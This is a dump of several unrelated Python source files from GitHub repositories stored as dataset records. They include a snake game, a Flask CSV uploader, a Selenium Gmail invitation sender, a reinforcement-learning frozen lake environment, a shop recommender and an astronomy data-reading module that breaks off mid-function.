cms.untracked.string(\"eTrigMatchEle27\"),\nmuTrigMatchMu17Src = cms.untracked.string(\"muTrigMatchMu17\"),\nmuTrigMatchMu18Src = cms.untracked.string(\"muTrigMatchMu18\"),\nmuTrigMatchMu24Src = cms.untracked.string(\"muTrigMatchMu24\"),\ntauTrigMatchMu17Src = cms.untracked.string(\"tauTrigMatchMu17\"),\ntauTrigMatchMu18Src = cms.untracked.string(\"tauTrigMatchMu18\"),\ntauTrigMatchMu24Src = cms.untracked.string(\"tauTrigMatchMu24\"),\ntauTrigMatchEle20Src = cms.untracked.string(\"tauTrigMatchEle20\"),\ntauTrigMatchEle22Src = cms.untracked.string(\"tauTrigMatchEle22\"),\ntauTrigMatchEle27Src = cms.untracked.string(\"tauTrigMatchEle27\"),\n\n )\n\n\nprocess.p = cms.Path(process.demo)\n","repo_name":"sshalhou/DemoTauCode","sub_path":"UserCode/TestTriggerAna/testtriggerana_cfg.py","file_name":"testtriggerana_cfg.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38753516241","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=invalid-name\n\"utils for inspecting objects and frames\"\nfrom typing import Dict, Any\nfrom collections import ChainMap\nfrom .inspection import diffobj\n\n\nclass ConfigObject:\n \"\"\"\n Object with a few helper function for comparison\n \"\"\"\n def __eq__(self, other):\n return isinstance(other, self.__class__) and self.__dict__ == other.__dict__\n\n def __init_subclass__(cls, hashattributes = (), **_):\n if hashattributes:\n def __hash__(self):\n return hash((self.__class__, *(getattr(self, i, '?') for i in hashattributes)))\n cls.__hash__ = __hash__\n return super().__init_subclass__(**_)\n\n def diff(self, other) -> Dict[str, Any]:\n \"return the diff with `other`\"\n return diffobj(self, other)\n\n def config(self, tpe = dict):\n \"return a chainmap with default and updated values\"\n fcn = getattr(self, '__getstate__', None)\n # pylint: disable=not-callable\n dself = fcn() if callable(fcn) else dict(self.__dict__)\n if tpe in (dict, 'dict'):\n return dself\n\n if all(hasattr(self.__class__, i) for i in dself):\n other = {i: getattr(self.__class__, i) for i in dself}\n else:\n # don't create a new instance unless necessary\n other = self.__class__().config(dict)\n return ChainMap(diffobj(dself, other), other)\n\ndef bind(ctrl, master, slave):\n \"\"\"\n bind to main tasks model\n \"\"\"\n if isinstance(master, str):\n master = ctrl.model(master)\n\n if isinstance(slave, str):\n slave = ctrl.model(slave)\n\n if master is not slave:\n ctrl.observe(master, lambda **_: ctrl.update(slave, **slave.diff(master)))\n","repo_name":"depixusgenome/libanalysis","sub_path":"utils/configobject.py","file_name":"configobject.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5784491452","text":"class GameUI:\n def __init__(self, game_service):\n self.__game_service = game_service\n\n def __print_board(self):\n print(self.__game_service.get_board_for_printing())\n\n def __move_snake(self, command):\n if len(command) == 2:\n try:\n command_count = int(command[1])\n except ValueError:\n raise ValueError(\"Invalid number of steps! It is not an integer!\")\n if command_count < 1:\n raise ValueError(\"Invalid number of steps! It is not a strictly positive integer!\")\n for i in range(command_count):\n game_over = self.__game_service.move_snake()\n if game_over:\n return True\n return False\n elif len(command) == 1:\n return self.__game_service.move_snake()\n else:\n raise ValueError(\"Invalid number of parameters for the move command!\")\n\n def __turn(self, command_word):\n return self.__game_service.turn(command_word)\n\n def play_game(self):\n self.__game_service.set_up()\n game_done = False\n while not game_done:\n try:\n self.__print_board()\n command = input(\"Give a command: \")\n command = command.split()\n if len(command) > 0:\n command_word = command[0]\n if command_word == \"move\":\n game_done = self.__move_snake(command)\n elif len(command) == 1 and command_word in [\"up\", \"down\", \"left\", \"right\"]:\n game_done = self.__turn(command_word)\n else:\n raise ValueError(\"Invalid command!\")\n else:\n raise ValueError(\"Invalid command!\")\n except ValueError as ve:\n print(ve)\n print(\"Game over! The snake is no more!\")","repo_name":"HoriaRaduRusu/Snake","sub_path":"src/ui/gameui.py","file_name":"gameui.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7299023382","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\nclass compose:\n def __init__(self,driver):\n self.driver = driver\n \n def compose_mail(self,invitation_df):\n wait = WebDriverWait(self.driver, 300)\n # iterate over invitation_df\n for index in range(len(invitation_df)):\n #click on compose button\n composeButton = wait.until(\n EC.visibility_of_element_located((By.XPATH, \"//div[contains(text(),'Compose')]\"))\n )\n composeButton.click()\n\n # enter the mail id\n toMail = wait.until(\n EC.visibility_of_element_located((By.XPATH, '//input[@class=\"agP aFw\" and @peoplekit-id=\"BbVjBd\"]'))\n )\n toMail.click()\n email_ID = invitation_df['Attendees'].iloc[index]\n toMail.send_keys(email_ID + Keys.ENTER)\n\n # enter the subject\n toSubject = self.driver.find_element(By.XPATH, '//input[@name=\"subjectbox\"]')\n subject = \"Invitation to the meeting on the topic: \" + invitation_df['Topic'].iloc[index]\n toSubject.click()\n toSubject.send_keys(subject + Keys.ENTER)\n\n # enter the body\n toBody = self.driver.find_element(By.XPATH, '//*[@aria-label=\"Message Body\" and @contenteditable=\"true\"]')\n toBody.click()\n toBody.send_keys(invitation_df['Invitation Link'].iloc[index])\n\n # send the mail\n self.driver.find_element(By.XPATH, \"//div[@class='dC']\").click()\n \n time.sleep(5)\n self.driver.close()","repo_name":"uddiGitHub/Automatic-Zoom-Meeting-Scheduler-with-Email-Integration","sub_path":"src/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13268327123","text":"# This package allows servers, requests, urls, etc.\nfrom flask import Flask, request, render_template, redirect, url_for\n# Create app var from Flask package\napp = Flask(__name__)\n\n# This packages allows for saving files to app dir\nimport os\nimport pandas as pd\n\n# Set path to upload csv (path of current app dirname)\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\n\n# Create get route, function to run on request\n@app.route('/')\ndef home_route():\n return render_template('upload.html')\n\n# Create post & get route, function to run on request\n@app.route('/results', methods=['POST', 'GET'])\ndef send_csv():\n if request.method == 'POST':\n if request.files['file'].filename == '' or request.files['file'].filename.endswith('.csv') == False:\n return redirect(url_for(\"home_route\"))\n else:\n target = os.path.join(APP_ROOT, 'static/uploads')\n file = request.files['file']\n filename = file.filename\n destination = \"/\".join([target, filename])\n file.save(destination)\n df = pd.read_csv(destination)\n print(df)\n # df.columns = ['column_1','column_2','column_3','column_4','column_5']\n csvfinal = df\n os.remove(destination)\n csvfinal.to_csv(target + '/updated_file.csv', index=False)\n return render_template('results.html')\n else:\n return redirect(url_for(\"home_route\"))\n\n# This runs the server (provided by Flask)\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"talfers/uploadr","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24719810327","text":"import numpy as np\nfrom gym import Env\n\n# MAP_SIZE = 6\n# SLIPPING_PROBABILITY = 0.94\n# BREAKING_PROBABILITY = 0.0001\nSLIPPING_PROBABILITY = 0.7\nBREAKING_PROBABILITY = 0.001\nMAP_SIZE = 15\nLEFT = 0\nDOWN = 1\nRIGHT = 2\nUP = 3\nX = 0\nY = 1\n\ndef make_map(studentNum): \n \"\"\"\n Observation Space : map of environment \n A 6*6 Grid Graph\n Start point = (0,0)\n End point = (5,5)\n Just one safe path for each Student number\n The probability of falling in each state:\n in safe path = 0.0001 and for other states = 1\n\n :param 1: Student number \n \n :return : The Created Map \n \"\"\"\n\n np.random.seed(studentNum) \n move = np.zeros((MAP_SIZE-1)*2) # Minimum moves for start to the end point in a 6*6 grid graph\n idx = np.random.choice(range((MAP_SIZE-1)*2),size=(MAP_SIZE-1),replace=False)\n move[idx] = 1\n\n point = [0,0]\n lowprobs = [tuple(point)]\n\n for m in move:\n if m:\n point[0] += 1\n else:\n point[1] += 1\n lowprobs.append(tuple(point))\n\n idx = np.array(lowprobs)\n # map = np.ones((MAP_SIZE,MAP_SIZE))\n map = np.random.random((MAP_SIZE,MAP_SIZE))\n map[idx[:,0],idx[:,1]] = BREAKING_PROBABILITY \n \n map[0,0] = 0.0 # Start point\n map[MAP_SIZE-1,MAP_SIZE-1] = 0.0 # End point\n\n return map\n\nclass FrozenLake(Env):\n def __init__(self, studentNum):\n \"\"\"\n Add whatever paramether you need :!\n\n - Student Number\n - action_space: All available actions the agent can perform.(LEFT = 0,DOWN = 1,RIGHT = 2,UP = 3)\n - observation_space: Structure of the observation.(map of environment)\n\n Dont forget to reset the environment :)\n \"\"\"\n self.map = make_map(studentNum)\n self.reset()\n\n def reset(self):\n \"\"\"\n Reset the state of the environment\n\n :return: Return the initial state\n \"\"\"\n self.state = (0,0)\n self.is_finished = False\n return self.state\n\n def find_next_states(self, action, current_state=None):\n if current_state == None:\n current_state = self.state\n states = np.array([[current_state[X],current_state[Y]-1], [current_state[X]+1,current_state[Y]], [current_state[X],current_state[Y]+1], [current_state[X]-1 ,current_state[Y]]])\n next_states = np.minimum(np.maximum(states, [[0,0]]*4), [[(MAP_SIZE-1),(MAP_SIZE-1)]]*4)\n next_states, counts = np.unique(next_states, axis=0, return_counts=True)\n breaking_probability = self.map[(np.array(next_states)[:,0]),(np.array(next_states)[:,1])]\n states_probability = counts*((1-SLIPPING_PROBABILITY)/3)\n states_probability[next_states.tolist().index((np.minimum(np.maximum(states[action], [0,0]),[(MAP_SIZE-1),(MAP_SIZE-1)])).tolist())] += (SLIPPING_PROBABILITY-((1-SLIPPING_PROBABILITY)/3)) \n is_end = [True if state == [(MAP_SIZE-1),(MAP_SIZE-1)] else False for state in next_states.tolist()]\n return next_states, states_probability, breaking_probability, is_end\n \n def step(self, action): \n \"\"\"\n Perform an action to the environment, provide observation for the new state and provide a reward\n \n :param 1:selected action \n\n :return: the next state of the env, the reward of the action, and whether the episode is finished\n \"\"\"\n states, states_probability, breaking_probability, is_end = self.find_next_states(action)\n random_state = np.random.choice(np.arange(len(states)), p = states_probability)\n is_fall = np.random.rand() < breaking_probability[random_state]\n reward = -1 + int(is_end[random_state])*100 + int((not is_end[random_state]) and is_fall)*(-10)\n self.is_finished = is_end[random_state] or is_fall\n self.state = tuple(states[random_state])\n return self.state, reward, self.is_finished\n \n\n def render(self):\n \"\"\"\n (Optional)\n Render the environment for visualization.\n \n :param 1 = instant state \n\n :return: map of environment\n \"\"\"\n environment_map = \"\"\n for i in range(MAP_SIZE):\n environment_map += (\"\\n\"+ int(9.33*MAP_SIZE)*\"-\" + \"\\n| \")\n for j in range(MAP_SIZE):\n if (i,j) == (0,0):\n environment_map += \"\\033[44m{:.4f}\\033[0m | \".format(self.map[i,j])\n elif (i,j) == (MAP_SIZE-1,MAP_SIZE-1):\n environment_map += \"\\033[42m{:.4f}\\033[0m | \".format(self.map[i,j])\n elif self.map[i,j] == BREAKING_PROBABILITY:\n environment_map += \"\\033[43m{:.4f}\\033[0m | \".format(self.map[i,j])\n else :\n environment_map += \"{:.4f} | \".format(self.map[i,j]) \n environment_map += (\"\\n\" + int(9.33*MAP_SIZE)*\"-\")\n print(environment_map) \n\n def close(self): \n \"\"\"\n (Optional) : Perform cleanup\n\n \"\"\"","repo_name":"mohammadsaadati80/Frozen-Lake-PI-VI","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7632540276","text":"#sys libs\n#include libs\nimport sys\nsys.path.insert(0, '..')\nfrom include import *\n\nfile = \"../../evaluations/source known.csv\"\n\nstudy_id = 9\n\nquery_id = 0\n\nscrapers_id = 0\n\nsearch_engine = \"Import\"\n\nresults_position = 0\n\nresults_import = 1\n\njob_id = 0\n\ntoday = date.today()\n\ntimestamp = datetime.now()\n\n\n\nwith open(file, 'r') as csvfile:\n csv_result = csv.reader(csvfile, delimiter=',', quotechar='\"')\n source = list(csv_result)\n\nfor url in source:\n\n url = url[0]\n\n check_url = Results.getURL(query_id, study_id, url, search_engine)\n if (not check_url):\n\n url_meta = Results.getResultMeta(url)\n hash = url_meta[0]\n ip = url_meta[1]\n main = url_meta[2]\n main_hash = Helpers.computeMD5hash(main)\n contact_url = \"0\"\n contact_hash = \"0\"\n contact_url = \"0\"\n\n Results.insertResult(query_id, study_id, job_id, results_import, ip, hash, main_hash, contact_hash, search_engine, url, main, contact_url, today, timestamp, 1, results_position)\n\n check_sources = Results.getSource(hash)\n if not check_sources:\n Results.insertSource(hash, None, None, None, today, 0)\n","repo_name":"searchstudies/seoeffekt","sub_path":"apps/import/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74233660673","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport time\nfrom joblib import Parallel, delayed\n\ndef applyParallel(dfGrouped, func):\n with Parallel(n_jobs=7) as parallel:\n retLst = parallel( delayed(func)(value) for value in dfGrouped.values )\n return pd.concat(retLst, axis=0)\n \n#==============================================================================\n# 构造规则\n#==============================================================================\n\ndef train_caculate(df): \n mall_id = df[6]\n evaluate_wifi_infos = df[5]\n \n def get_shop_weight_dict(shop,evaluate_wifi_infos):\n match_wifi_info = ave_shop_wifi_infos.loc[shop]['ave_value_wifi']\n weight_count = calculate_weight(match_wifi_info,evaluate_wifi_infos)\n shop_weight1[shop] = weight_count \n \n match_shops = pd.Series(shop_id_mall.loc[mall_id].shop_ids)\n #策略1\n shop_weight1 = {}\n match_shops.map(lambda shop : get_shop_weight_dict(shop,evaluate_wifi_infos))\n #字典sorted排序后返回的是一个list数组\n shop_weight1 = sorted(shop_weight1.items(),key=lambda item:item[1],reverse=True)\n \n #取权重前三的所有bssid\n ####去重,并按照原来顺序排序\n temp_weight = [ele[1] for ele in shop_weight1]\n weight = list(set(temp_weight))\n weight.sort(key=temp_weight.index)\n \n tj_shop_ids = []\n if len(weight)>=3:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[1]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[2]:\n tj_shop_ids.append(ele[0])\n \n if len(weight)==2:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[1]:\n tj_shop_ids.append(ele[0])\n if len(tj_shop_ids)>3:\n break\n \n if len(weight)==1:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if len(tj_shop_ids)>3:\n break\n \n #若推荐的shop_id与真实的不同,修改其中一个shop_id\n shop_id = df[1]\n if shop_id not in set(tj_shop_ids):\n del tj_shop_ids[len(tj_shop_ids)-1]\n tj_shop_ids.append(shop_id)\n \n temp_df = [] \n for index,ele in enumerate(set(tj_shop_ids)):\n if index == 0:\n temp_df = pd.DataFrame({'row_id':[df[7]],'tj_shop_id':[ele]})\n else:\n temp_df = pd.concat([temp_df,pd.DataFrame({'row_id':[df[7]],'tj_shop_id':[ele]})])\n \n return temp_df\n\ndef test_caculate(df): \n mall_id = df[2]\n evaluate_wifi_infos = df[6]\n \n def get_shop_weight_dict(shop,evaluate_wifi_infos):\n match_wifi_info = ave_shop_wifi_infos.loc[shop]['ave_value_wifi']\n weight_count = calculate_weight(match_wifi_info,evaluate_wifi_infos)\n shop_weight1[shop] = weight_count \n \n match_shops = pd.Series(shop_id_mall.loc[mall_id].shop_ids)\n #策略1\n shop_weight1 = {}\n match_shops.map(lambda shop : get_shop_weight_dict(shop,evaluate_wifi_infos))\n #字典sorted排序后返回的是一个list数组\n shop_weight1 = sorted(shop_weight1.items(),key=lambda item:item[1],reverse=True)\n \n #取权重前三的所有bssid\n ####去重,并按照原来顺序排序\n temp_weight = [ele[1] for ele in shop_weight1]\n weight = list(set(temp_weight))\n weight.sort(key=temp_weight.index)\n \n tj_shop_ids = []\n if len(weight)>=3:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[1]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[2]:\n tj_shop_ids.append(ele[0])\n \n if len(weight)==2:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if ele[1] == weight[1]:\n tj_shop_ids.append(ele[0])\n if len(tj_shop_ids)>3:\n break\n \n if len(weight)==1:\n for ele in shop_weight1:\n if ele[1] == weight[0]:\n tj_shop_ids.append(ele[0])\n if len(tj_shop_ids)>3:\n break\n \n temp_df = [] \n for index,ele in enumerate(set(tj_shop_ids)):\n if index == 0:\n temp_df = pd.DataFrame({'row_id':[df[0]],'tj_shop_id':[ele]})\n else:\n temp_df = pd.concat([temp_df,pd.DataFrame({'row_id':[df[0]],'tj_shop_id':[ele]})])\n \n return temp_df\n\n#==============================================================================\n# 根据match_wifi_info和evaluate_wifi_infos进行计算一个店铺的加权数\n#==============================================================================\n\ndef calculate_weight(match_wifi_info,evaluate_wifi_infos):\n weight_count = 0 \n wifi = sorted([wifi.split('|') for wifi in evaluate_wifi_infos.split(';')],key=lambda x:int(x[1]),reverse=True)\n for wifi_info in wifi:\n bssid,rss = wifi_info[0],wifi_info[1] \n if bssid in match_wifi_info: \n #策略1\n if abs(int(rss)-int(match_wifi_info.get(bssid)))'2017-08-28 23:50')]\n test = pd.merge(user_shop_hehavior,shop_info[['shop_id','mall_id']],on='shop_id',how='left')\n test['row_id'] = range(len(test))\n pre_test = applyParallel(test,train_caculate)\n \n#==============================================================================\n# pre_test = pd.DataFrame({'row_id':[0],'shop_id':[0],'weight':[0],'shop_ids':[0]})\n# for line in test.values:\n# pre_test = pd.concat([pre_test,train_caculate(line)])\n# print('********')\n#==============================================================================\n \n pre_test = pd.merge(pre_test,test,on='row_id',how='left')\n pre_test['label'] = (pre_test['shop_id']==pre_test['tj_shop_id']).astype(int)\n print('正负样本比例 : ',pre_test['label'].value_counts(),'耗时: ',time.time()-t0)\n pre_test.to_csv('./data/rec_shop_id_801_831.csv',index=False)\n \n#==============================================================================\n# pre_test.to_csv('./data/rec_shop_id_822_824.csv',index=False)\n# pre_test = applyParallel(evaluation_data,test_caculate)\n# pre_test = pd.merge(pre_test,evaluation_data,on = 'row_id',how = 'left')\n# pre_test.to_csv('./data/rec_shop_id_901_915.csv',index=False)\n#==============================================================================\n print('耗时: ',time.time()-t0)\n ","repo_name":"LDongning/Shop-Position","sub_path":"tuijian.py","file_name":"tuijian.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33442312868","text":"#!/usr/bin/env python3\n\nimport argparse, os, re\n\nparser = argparse.ArgumentParser(description=\"Rebase a TSV file's wav files.\")\nparser.add_argument('filename', help='Dataset TSV file to rebase.')\nparser.add_argument('new_wav_path', help='Path to directory containing the wav files.')\nargs = parser.parse_args()\n\nif not os.path.exists(args.filename):\n raise Exception('File does not exist: %s' % args.filename)\nif not os.path.exists(args.new_wav_path):\n raise Exception('Path does not exist: %s' % args.new_wav_path)\n\nlines = []\nwith open(args.filename, 'r') as f:\n for line in f:\n fields = line.rstrip('\\n').split('\\t')\n wav_path = fields[0]\n wav_path = re.sub(r'\\\\', '/', wav_path)\n wav_path = re.sub(r'^.*/', '', wav_path)\n wav_path = os.path.join(args.new_wav_path, wav_path)\n fields[0] = wav_path\n lines.append(fields)\n\nwith open(args.filename, 'w') as f:\n for line in lines:\n f.write('\\t'.join(line) + '\\n')\n","repo_name":"daanzu/kaldi_ag_training","sub_path":"rebase_tsv.py","file_name":"rebase_tsv.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"21834825805","text":"##################################################################################\n#\n# apogee.tools.read: read various APOGEE data files\n#\n# contains:\n# \n# - allStar: read the allStar.fits file\n# - apogeeDesign: read the apogeeDesign file\n# - apogeeField: read the apogeeField file\n# - apogeeObject: read an apogeeObject file\n# - apogeePlate: read the apogeePlate file\n# - apokasc: read the APOKASC catalog\n# - mainIndx: return the index of main targets in a data set\n# - obslog: read the observation log\n# - rcsample: read the red clump sample\n#\n##################################################################################\nfrom functools import wraps\nimport os\nimport sys\nimport copy\nimport warnings\nimport numpy\ntry:\n import esutil\n _ESUTIL_LOADED= True\n _ESUTIL_VERSION= [int(v.split('rc')[0])\n for v in esutil.__version__.split('.')]\nexcept ImportError:\n _ESUTIL_LOADED= False\ntry:\n import fitsio\n fitsread= fitsio.read\n fitswrite=fitsio.write\n headerread=fitsio.read_header\n _FITSIO_LOADED = True\nexcept ImportError:\n import astropy.io.fits as pyfits\n fitsread= pyfits.getdata\n fitswrite=pyfits.writeto\n headerread=pyfits.getheader\n _FITSIO_LOADED = False\nimport tqdm\nfrom apogee_tools.apogee_hack.tools import path, paramIndx, download\n_ERASESTR= \" \"\ndef modelspecOnApStarWavegrid(func):\n \"\"\"Decorator to put a model spectrum onto the apStar wavelength grid\"\"\"\n @wraps(func)\n def output_wrapper(*args,**kwargs):\n out= func(*args,**kwargs)\n if kwargs.get('apStarWavegrid',True) \\\n or (kwargs.get('ext',-1) == 234 \\\n and kwargs.get('apStarWavegrid',True)):\n if len(out.shape) == 2:\n newOut= numpy.zeros((8575,out.shape[0]),dtype=out.dtype)\\\n +numpy.nan\n out= out.T\n else:\n newOut= numpy.zeros(8575,dtype=out.dtype)+numpy.nan\n if len(out) == 7214:\n newOut[322:3242]= out[:2920]\n newOut[3648:6048]= out[2920:5320]\n newOut[6412:8306]= out[5320:]\n else:\n newOut[246:3274]= out[:3028]\n newOut[3585:6080]= out[3028:5523]\n newOut[6344:8335]= out[5523:]\n if len(out.shape) == 2:\n out= newOut.T\n else:\n out= newOut\n return out\n return output_wrapper\n\ndef specOnAspcapWavegrid(func):\n \"\"\"Decorator to put an APOGEE spectrum onto the ASPCAP wavelength grid\"\"\"\n @wraps(func)\n def output_wrapper(*args,**kwargs):\n out= func(*args,**kwargs)\n if kwargs.get('header',True):\n out, hdr= out\n if kwargs.get('aspcapWavegrid',False):\n if len(out.shape) == 2:\n newOut= numpy.zeros((7214,out.shape[0]),dtype=out.dtype)\n if issubclass(out.dtype.type,numpy.float): newOut+= numpy.nan\n out= out.T\n else:\n newOut= numpy.zeros(7214,dtype=out.dtype)\n if issubclass(out.dtype.type,numpy.float): newOut+= numpy.nan\n newOut[:2920]= out[322:3242]\n newOut[2920:5320]= out[3648:6048]\n newOut[5320:]= out[6412:8306]\n if len(out.shape) == 2:\n out= newOut.T\n else:\n out= newOut\n if kwargs.get('header',True):\n return (out,hdr)\n else:\n return out\n return output_wrapper\n\ndef allStar(rmcommissioning=True,\n main=False,\n exclude_star_bad=False,\n exclude_star_warn=False,\n ak=True,\n akvers='targ',\n rmnovisits=False,\n adddist=False,\n distredux=None,\n rmdups=False,\n raw=False):\n \"\"\"\n NAME:\n allStar\n PURPOSE:\n read the allStar file\n INPUT:\n rmcommissioning= (default: True) if True, only use data obtained after commissioning\n main= (default: False) if True, only select stars in the main survey\n exclude_star_bad= (False) if True, remove stars with the STAR_BAD flag set in ASPCAPFLAG\n exclude_star_warn= (False) if True, remove stars with the STAR_WARN flag set in ASPCAPFLAG\n ak= (default: True) only use objects for which dereddened mags exist\n akvers= 'targ' (default) or 'wise': use target AK (AK_TARG) or AK derived from all-sky WISE (AK_WISE)\n rmnovisits= (False) if True, remove stars with no good visits (to go into the combined spectrum); shouldn't be necessary\n adddist= (default: False) add distances (DR10/11 Hayden distances, DR12 combined distances)\n distredux= (default: DR default) reduction on which the distances are based\n rmdups= (False) if True, remove duplicates (very slow)\n raw= (False) if True, just return the raw file, read w/ fitsio\n OUTPUT:\n allStar data\n HISTORY:\n 2013-09-06 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.allStarPath()\n if not os.path.exists(filePath):\n download.allStar()\n #read allStar file\n data= fitsio.read(path.allStarPath())\n if raw: return data\n #Remove duplicates, cache\n if rmdups:\n dupsFilename= path.allStarPath().replace('.fits','-nodups.fits')\n if os.path.exists(dupsFilename):\n data= fitsio.read(dupsFilename)\n else:\n sys.stdout.write('\\r'+\"Removing duplicates (might take a while) and caching the duplicate-free file ...\\r\")\n sys.stdout.flush()\n data= remove_duplicates(data)\n #Cache this file for subsequent use of rmdups\n fitsio.write(dupsFilename,data,clobber=True)\n sys.stdout.write('\\r'+_ERASESTR+'\\r')\n sys.stdout.flush()\n #Some cuts\n if rmcommissioning:\n indx= numpy.array(['apogee.n.c'.encode('utf-8') in s for s in data['APSTAR_ID']])\n indx+= numpy.array(['apogee.s.c'.encode('utf-8') in s for s in data['APSTAR_ID']])\n data= data[True^indx]\n if rmnovisits:\n indx= numpy.array([s.strip() != '' for s in data['VISITS']])\n data= data[indx]\n if main:\n indx= mainIndx(data)\n data= data[indx]\n if akvers.lower() == 'targ':\n aktag= 'AK_TARG'\n elif akvers.lower() == 'wise':\n aktag= 'AK_WISE'\n if ak:\n data= data[True^numpy.isnan(data[aktag])]\n data= data[(data[aktag] > -50.)]\n if exclude_star_bad:\n data= data[(data['ASPCAPFLAG'] & 2**23) == 0]\n if exclude_star_warn:\n data= data[(data['ASPCAPFLAG'] & 2**7) == 0]\n #Add dereddened J, H, and Ks\n aj= data[aktag]*2.5\n ah= data[aktag]*1.55\n if _ESUTIL_LOADED:\n data= esutil.numpy_util.add_fields(data,[('J0', float),\n ('H0', float),\n ('K0', float)])\n data['J0']= data['J']-aj\n data['H0']= data['H']-ah\n data['K0']= data['K']-data[aktag]\n data['J0'][(data[aktag] <= -50.)]= -9999.9999\n data['H0'][(data[aktag] <= -50.)]= -9999.9999\n data['K0'][(data[aktag] <= -50.)]= -9999.9999\n else:\n warnings.warn(\"Extinction-corrected J,H,K not added because esutil is not installed\",RuntimeWarning)\n #Add distances\n if adddist and _ESUTIL_LOADED:\n dist= fitsio.read(path.distPath(),1)\n h=esutil.htm.HTM()\n m1,m2,d12 = h.match(dist['RA'],dist['DEC'],\n data['RA'],data['DEC'],\n 2./3600.,maxmatch=1)\n data= data[m2]\n dist= dist[m1]\n distredux= path._redux_dr()\n if distredux.lower() == 'v302' or distredux.lower() == path._DR10REDUX:\n data= esutil.numpy_util.add_fields(data,[('DM05', float),\n ('DM16', float),\n ('DM50', float),\n ('DM84', float),\n ('DM95', float),\n ('DMPEAK', float),\n ('DMAVG', float),\n ('SIG_DM', float),\n ('DIST_SOL', float),\n ('SIG_DISTSOL', float)])\n data['DM05']= dist['DM05']\n data['DM16']= dist['DM16']\n data['DM50']= dist['DM50']\n data['DM84']= dist['DM84']\n data['DM95']= dist['DM95']\n data['DMPEAK']= dist['DMPEAK']\n data['DMAVG']= dist['DMAVG']\n data['SIG_DM']= dist['SIG_DM']\n data['DIST_SOL']= dist['DIST_SOL']/1000.\n data['SIG_DISTSOL']= dist['SIG_DISTSOL']/1000.\n elif distredux.lower() == path._DR11REDUX:\n data= esutil.numpy_util.add_fields(data,[('DISO', float),\n ('DMASS', float),\n ('DISO_GAL', float),\n ('DMASS_GAL', float)])\n data['DISO']= dist['DISO'][:,1]\n data['DMASS']= dist['DMASS'][:,1]\n data['DISO_GAL']= dist['DISO_GAL'][:,1]\n data['DMASS_GAL']= dist['DMASS_GAL'][:,1]\n elif distredux.lower() == path._DR12REDUX:\n data= esutil.numpy_util.add_fields(data,[('HIP_PLX', float),\n ('HIP_E_PLX', float),\n ('RC_DIST', float),\n ('APOKASC_DIST_DIRECT', float),\n ('BPG_DIST1_MEAN', float),\n ('HAYDEN_DIST_PEAK', float),\n ('SCHULTHEIS_DIST', float)])\n data['HIP_PLX']= dist['HIP_PLX']\n data['HIP_E_PLX']= dist['HIP_E_PLX']\n data['RC_DIST']= dist['RC_dist_pc']\n data['APOKASC_DIST_DIRECT']= dist['APOKASC_dist_direct_pc']/1000.\n data['BPG_DIST1_MEAN']= dist['BPG_dist1_mean']\n data['HAYDEN_DIST_PEAK']= 10.**(dist['HAYDEN_distmod_PEAK']/5.-2.)\n data['SCHULTHEIS_DIST']= dist['SCHULTHEIS_dist']\n elif adddist:\n warnings.warn(\"Distances not added because matching requires the uninstalled esutil module\",RuntimeWarning)\n if _ESUTIL_LOADED and (path._APOGEE_REDUX.lower() == 'current' \\\n or 'l30' in path._APOGEE_REDUX.lower() \\\n or int(path._APOGEE_REDUX[1:]) > 600):\n data= esutil.numpy_util.add_fields(data,[('METALS', float),\n ('ALPHAFE', float)])\n data['METALS']= data['PARAM'][:,paramIndx('metals')]\n data['ALPHAFE']= data['PARAM'][:,paramIndx('alpha')]\n return data\n \ndef allVisit(rmcommissioning=True,\n main=False,\n ak=True,\n akvers='targ',\n plateInt=False,\n plateS4=False,\n raw=False):\n \"\"\"\n NAME:\n allVisit\n PURPOSE:\n read the allVisit file\n INPUT:\n rmcommissioning= (default: True) if True, only use data obtained after commissioning\n main= (default: False) if True, only select stars in the main survey\n ak= (default: True) only use objects for which dereddened mags exist\n akvers= 'targ' (default) or 'wise': use target AK (AK_TARG) or AK derived from all-sky WISE (AK_WISE)\n plateInt= (False) if True, cast plate as an integer and give special plates -1\n plateS4= (False) if True, cast plate as four character string\n raw= (False) if True, just return the raw file, read w/ fitsio\n 